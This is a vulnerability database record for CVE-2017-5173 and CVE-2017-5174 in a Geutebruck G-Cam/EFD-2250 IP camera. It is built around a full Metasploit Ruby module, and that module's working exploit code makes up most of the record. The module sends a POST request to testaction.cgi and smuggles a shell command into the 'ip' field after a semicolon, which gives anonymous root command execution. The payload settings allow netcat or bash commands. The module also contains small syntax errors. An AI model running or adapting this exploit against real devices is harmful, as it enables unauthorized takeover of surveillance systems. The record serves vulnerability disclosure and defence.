ID

VAR-E-201702-0193


CVE

cve_id:CVE-2017-5173

Trust: 1.5

cve_id:CVE-2017-5174

Trust: 1.5

sources: PACKETSTORM: 141142 // EXPLOIT-DB: 41360

EDB ID

41360


TITLE

Geutebruck 5.02024 G-Cam/EFD-2250 - 'testaction.cgi' Remote Command Execution (Metasploit) - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 41360

DESCRIPTION

Geutebruck 5.02024 G-Cam/EFD-2250 - 'testaction.cgi' Remote Command Execution (Metasploit). CVE-2017-5174CVE-2017-5173 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 41360

AFFECTED PRODUCTS

vendor:geutebruckmodel:g-cam/efd-2250scope:eqversion:5.02024

Trust: 2.2

vendor:geutebruckmodel:testaction.cgi remotescope: - version: -

Trust: 0.5

sources: PACKETSTORM: 141142 // EXPLOIT-DB: 41360 // EDBNET: 91028 // EDBNET: 90987

EXPLOIT

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Geutebruck testaction.cgi Remote Command Execution',
'Description' => %q{
This module exploits a an arbitrary command execution vulnerability. The
vulnerability exists in the /uapi-cgi/viewer/testaction.cgi page and allows an
anonymous user to execute arbitrary commands with root privileges.
Firmware <= 1.11.0.12 are concerned.
Tested on 5.02024 G-Cam/EFD-2250 running 1.11.0.12 firmware.
},
'Author' =>
[
'Davy Douhine', #CVE-2017-5173 (RCE) and metasploit module
'Florent Montel' #CVE-2017-5174 (Authentication bypass)
'Frederic Cikala' #CVE-2017-5174 (Authentication bypass)
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-5173' ],
[ 'CVE', '2017-5174' ],
[ 'URL', 'http://geutebruck.com' ]
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-045-02' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat bash',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 16 2016'))

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to webapp', '/uapi-cgi/viewer/testaction.cgi']),
], self.class)
end

def exploit
uri = normalize_uri(target_uri.path)
print_status("#{rhost}:#{rport} - Attempting to exploit...")
command = payload.encoded
res = send_request_cgi(
{
'uri' => uri,
'method' => 'POST',
'vars_post' => {
'type' => "ip",
'ip' => "eth0 1.1.1.1;#{command}",
},
})
end

end

Trust: 1.0

sources: EXPLOIT-DB: 41360

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 41360

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 41360

TYPE

'testaction.cgi' Remote Command Execution (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 41360

TAGS

tag:exploit

Trust: 0.5

tag:arbitrary

Trust: 0.5

tag:cgi

Trust: 0.5

tag:root

Trust: 0.5

sources: PACKETSTORM: 141142

CREDITS

RandoriSec

Trust: 0.6

sources: EXPLOIT-DB: 41360

EXTERNAL IDS

db:ICS CERTid:ICSA-17-045-02

Trust: 2.7

db:EXPLOIT-DBid:41360

Trust: 1.6

db:NVDid:CVE-2017-5173

Trust: 1.5

db:NVDid:CVE-2017-5174

Trust: 1.5

db:EDBNETid:91028

Trust: 0.6

db:0DAYTODAYid:27016

Trust: 0.6

db:EDBNETid:90987

Trust: 0.6

db:PACKETSTORMid:141142

Trust: 0.5

sources: PACKETSTORM: 141142 // EXPLOIT-DB: 41360 // EDBNET: 91028 // EDBNET: 90987

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2017-5173

Trust: 1.5

url:https://nvd.nist.gov/vuln/detail/cve-2017-5174

Trust: 1.5

url:https://gist.github.com/ddouhine/59f92e5dde3d4003aed919409b5ac44e

Trust: 1.0

url:https://www.exploit-db.com/exploits/41360/

Trust: 0.6

url:https://0day.today/exploits/27016

Trust: 0.6

sources: PACKETSTORM: 141142 // EXPLOIT-DB: 41360 // EDBNET: 91028 // EDBNET: 90987

SOURCES

db:PACKETSTORMid:141142
db:EXPLOIT-DBid:41360
db:EDBNETid:91028
db:EDBNETid:90987

LAST UPDATE DATE

2022-07-27T09:40:04.434000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:141142date:2017-02-17T01:01:00
db:EXPLOIT-DBid:41360date:2017-02-15T00:00:00
db:EDBNETid:91028date:2017-02-21T00:00:00
db:EDBNETid:90987date:2017-02-15T00:00:00